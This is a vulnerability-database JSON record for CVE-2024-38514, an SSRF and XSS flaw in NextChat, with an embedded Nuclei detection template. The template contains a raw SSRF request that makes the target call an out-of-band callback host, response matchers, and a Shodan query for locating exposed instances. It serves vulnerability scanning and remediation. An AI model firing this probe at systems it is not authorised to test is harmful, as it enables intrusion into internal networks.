{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2024-38514/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2024-38514/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2024-38514/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2024-38514/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2024-38514/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2024-38514"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2024-38514"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2024/CVE-2024-38514.yaml",
    "nuclei_template_severity": "high",
    "nuclei_template_yaml": "id: CVE-2024-38514\n\ninfo:\n  name: NextChat - Server-Side Request Forgery\n  author: DhiyaneshDk\n  severity: high\n  description: |\n    NextChat v2.12.3 suffers from a Server-Side Request Forgery (SSRF) and Cross-Site Scripting vulnerability due to a lack of validation of the GET parameter on the WebDav API endpoint.\n  impact: |\n    Unauthenticated attackers can perform SSRF attacks to access internal services, scan internal networks, or exfiltrate sensitive information from systems that should not be accessible externally.\n  remediation: |\n    Upgrade to NextChat version 2.12.4 or later that includes proper validation of the endpoint parameter.\n  reference:\n    - https://www.tenable.com/security/research/tra-2024-23\n    - https://github.com/ChatGPTNextWeb/ChatGPT-Next-Web/commit/dad122199a85c2f12277593973e1784b212adf5e\n    - https://github.com/ChatGPTNextWeb/ChatGPT-Next-Web/security/advisories/GHSA-gph5-rx77-3pjg\n    - https://nvd.nist.gov/vuln/detail/CVE-2024-38514\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N\n    cvss-score: 7.4\n    cve-id: CVE-2024-38514\n    cwe-id: CWE-918\n    epss-score: 0.02168\n    epss-percentile: 0.81467\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: \"title:NextChat,\\\"ChatGPT Next Web\\\"\"\n  tags: cve,cve2024,ssrf,xss,chatgpt,nextchat,vkev,vuln,ai\n\nhttp:\n  - raw:\n      - |\n        GET /api/webdav/chatgpt-next-web/backup.json?endpoint=https://webdav.yandex.com.{{interactsh-url}}/ HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"dns\"\n\n      - type: word\n        part: body\n        words:\n          - \"__NEXT_DATA__\"\n# digest: 4a0a00473045022100df1d3eece8a177425f2934b4895ae0369f34ec4788f7f52c3b8b199382d8f52f02204ac631ec9d78c0b46ed5f1755d4bfd8a78c2bcd4c824538146ff7462aa798cdc:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2024-38514"
}